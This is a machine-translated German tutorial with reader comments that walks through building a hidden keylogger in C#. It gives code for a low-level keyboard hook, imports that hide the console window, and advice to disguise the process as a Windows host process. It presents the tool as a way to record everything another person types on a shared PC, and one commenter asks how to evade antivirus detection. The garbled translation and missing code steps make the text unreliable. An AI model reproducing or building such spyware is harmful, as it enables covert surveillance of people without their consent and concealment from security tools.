So erstellen Sie eine einfache, versteckte Konsole Keylogger in C # - Null Byte
Erstellen Sie, wie man eine einfache, versteckte Konsole Keylogger in C #
Heute werde ich Ihnen zeigen, wie eine einfache Keylogger in Visual C # erstellen, die von der Ansicht versteckt starten wird, und alles, was der Benutzer auf dem Keybord aufzeichnen, dann speichern Sie sie in eine Textdatei. Großartig, wenn Sie einen PC teilen und verfolgen möchten, was jemand anderes schreibt.
Du wirst brauchen
Erstellen Sie Schritt 1 des Projekts
Warum? Nun, das ist die EXE-Datei umbenennen nicht genug, der Name, den Sie Ihr Projekt geben wird in der Task-Manager angezeigt werden, so vorausgesetzt, Sie nicht eine sehr technische Benutzer sind, wenn Sie einen Prozess sehen namens ‚‘ cmd.exe | ConsoleApplication5" dann Glocken Alarm sollte nicht jedoch klingeln, wenn Sie sehen. „SysWin86 | Windows Local Host Process "Sie werden nicht sofort wissen, dass es kein rechtmäßiges Verfahren ist.
So erstellen Projekt eine Konsolenanwendung. nennen Sie es angemessen und in der „Verwendung“ -Klausel, umfassen die folgenden, wenn es nicht bereits vorhanden ist:
Direkt unter „Klasse IhrProjekt“, fügen Sie die folgenden:
Private const int WH_KEYBOARD_LL = 13;
Private const int WM_KEYDOWN = 0x0100;
private static LowLevelKeyboardProc _proc = HookCallback;
private static IntPtr _hookID = IntPtr.Zero;
In der Funktion "Main" ( "public static Main") hinzufügen:
Schließlich geht in Projekt >> Referenzen hinzufügen.
In der Registerkarte .NET wählen System.Windows.Forms und es zu einem Projekt hinzuzufügen.
Schritt 3 Funktionen für Key Capturing
Unterhalb der Hauptsatz, fügen Sie diese Funktionen:
Private delegieren IntPtr LowLevelKeyboardProc (
int nCode, IntPtr WParam, IntPtr lParam);
Schritt 4 DLL Importe
die wichtigsten Capture-Funktionen Nach dem Hinzufügen, fügen Sie diese:
// Diese DLL werden die Haken behandeln. Yaaar mateys!
[DllImport ( "user32.dll", charset = CharSet.Auto, SetLastError = true)]
private static extern IntPtr SetWindowsHookEx (int idHook,
LowLevelKeyboardProc lpfn, IntPtr hMod, uint dwThreadId);
[DllImport ( "user32.dll", charset = CharSet.Auto, SetLastError = true)]
private static extern IntPtr CallNextHookEx (IntPtr hhk, int nCode,
IntPtr WParam, IntPtr lParam);
[DllImport ( "kernel32.dll", charset = CharSet.Auto, SetLastError = true)]
private static extern IntPtr GetModuleHandle (string lpModuleName);
// Die beiden dll Importe unter das Fenster versteckt behandeln.
[DllImport ( "user32.dll")]
static extern bool Showwindow (IntPtr hWnd, int nCmdShow);
Schritt 5 Compile und probieren Sie es aus!
Dies ist der Spaß Schritt. Sobald Sie den gesamten Code hinzugefügt haben, nur den Compiler laufen und die EXE-Datei ausprobieren!
Da das Fenster ausgeblendet ist, aber immer noch zeichnet jeden Tastendruck, werden Sie nun alle Tastatureingaben jemals auf diesem PC gedrückt einloggen.
weitere Verbesserungen
"Sauce" -Code
Hooray für Keyloggern, Vielen Dank! Ich habe es immer gehasst, wie einfach C #, VB, etc. immer einen Keylogger gemacht machen, haha. Es ist etwa 8 Millionen mal härter als diese es auf Python zu tun, die mich xD ärgert. Nun, in Linux zumindest, da Windows-Libs und API sind easy..Whereas auf Linux, Sie haben ziemlich viel xlib besitzen. Wie unfair.
Ja, aber unter Linux funktioniert es immer. Während an den Fenstern, es funktioniert nur, wenn Sie 100 mil Abhängigkeiten installiert haben und alle .NET-Funktionen up-to-date.
Dies ist, was ich hasse auf Fenster, es nie wirklich funktioniert. nicht wirklich. 1 pc = / = andere. Beide mit Windows 7 zum Beispiel.
Ja, das ist immer wahr: D. Guter Punkt. / Me wünscht Python hatte getKeystrokes () xD.
private static IntPtr SetHook (LowLevelKeyboardProc proc)
Verwendung von (Process curProcess = Process.GetCurrentProcess ())
Verwendung von (Process curModule = curProcess.MainModule)
Rück SetWindowsHookEx (WHKEYBOARD LL, proc,
GetModuleHandle (curModule.ModuleName), 0);
>
>
P. S: der DLL-Name WHKEYBOARD LL hat einen Unterstrich nach WH und Tastatur
Ich bin neu in Visual Studio. Der obige Code gearbeitet und dann veröffentlichte ich das Projekt lokalen Host-Prozess und installierte es, und der Task-Manager zeigt, dass der App noch läuft. Mein Zweifel ist, wo die Protokolldatei ist, während als eigenständige App ausgeführt wird. Ich kann es nicht überall sehen. Bitte um Hilfe!
Wenn ich es kompilieren, springt mein Antivirus mich eines Win32 / Spy.Agent.NSO Virus zu warnen. Gibt es eine Möglichkeit unsichtbar für den Anti-Virus zu machen?
Nun, ich habe viele Fragen.
Zunächst einmal, wie bekomme ich die Schlüssel für Groß- und Kleinbuchstaben verwenden diese zu unterscheiden? Es ist ganz wichtig.
Zweite Frage:
Gibt es trotzdem, um dieses Problem beheben?
Last but not least, ist es eine Möglichkeit, Keynames wie „Left Shift“, „Return“ und Schlüssel zu konvertieren, das visuelle Erscheinungsbild in ihre visuelle Erscheinung haben? Ich würde davon ausgehen, es ist, aber der Code ist ziemlich schwer für mich zu begreifen.